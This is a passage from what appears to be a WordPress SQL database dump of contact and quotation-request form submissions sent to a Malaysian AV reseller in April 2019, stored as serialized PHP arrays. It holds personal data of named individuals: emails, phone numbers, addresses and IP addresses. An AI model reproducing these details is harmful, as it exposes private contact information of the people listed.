model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:51:\"Please provide me the quotation for Jabra Elite 65t\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"99\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-08 10:43:46','58.26.144.2','1'),(143,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Rajan Kumar Upadhyay\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"rajan.upadhyay@dhl.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192826046\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"DHL\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:46:\"3509, 3511 Jalan Teknokrat 5, 63000, Cyberjaya\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Logitech Rally, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Need it for a conference room for approx 25 people\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-09 15:20:04','199.40.204.245','1'),(144,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Toh Chin Peng\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"chinpeng.toh@ytl.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0321170088\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"Syarikat Pembenaan Yeoh Tiong Lay Sdn.Bhd.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:72:\"16th Floor, One Oriental Place, 1, Jalan Hang Lekiu, 50100 Kuala Lumpur.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"11\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-10 11:01:47','202.56.82.122','1'),(145,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Chin Shu Jia\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"shu-jia.s.chin@shell.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60128768738\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Sabah Shell Petroleum Co. Ltd,\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:127:\"Logitech Slim Folio Ipad Keyboard, Model Number: A1893 (Wi-Fi), Released: March 2018, Display Size: 9.7 inches (Retina Display)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"83\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-10 11:26:08','165.225.116.189','1'),(146,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"MM Hoq\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"excelbd16@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"+8801817589531\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Excel Group\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Road 13, House 7, Dhanmondi Dhaka\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Please give me the best price!\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-10 13:11:28','119.148.9.62','1'),(147,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Tan Wei Lie\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"tan.wei.lie@hyundai.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0134249212\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Hyundai-Sime Darby Motors Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:56:\"Meeting Room design &amp; audio video system integration\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"19\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-11 14:56:04','42.153.129.216','1'),(148,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"JOAN NEO\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"sutin72@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60107763967\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"SIFT CENTER\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"need proposal\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"22\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-12 13:51:50','60.50.187.234','1'),(149,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Weei Herng H&#039;ng\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"weeiherng.hng@ipsoftcom.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0175225288\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"IP Softcom (M) Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:507:\"RFQ - Logitech Speaker (Part # 980-000514) Dear Sirs, I am Buyer/Planner from IP Softcom (M) Sdn. Bhd. Which located in Penang island. We are sourcing for below Logitech part. Kindly help to check and provide quotation for below part. Please revert asap. Manufacturer Logitech Manufacturer Part No 980-000514 Description Z120 USB Powered Speakers MOQ To Quote 10k, 20k and 30k pcs Remarks Please provide information as per below. 1. Warranty 2. Lead time 3. Packaging information 4. Incoterm, Pickup address\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"32\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-15 07:54:36','219.92.228.65','1'),(150,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Ahmad Assraf Bin Kamaruddin\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"assraf.kamaruddin@beicip.asia\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60321651712\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Beicip Technology Solutions Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"New conference room setup proposal\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 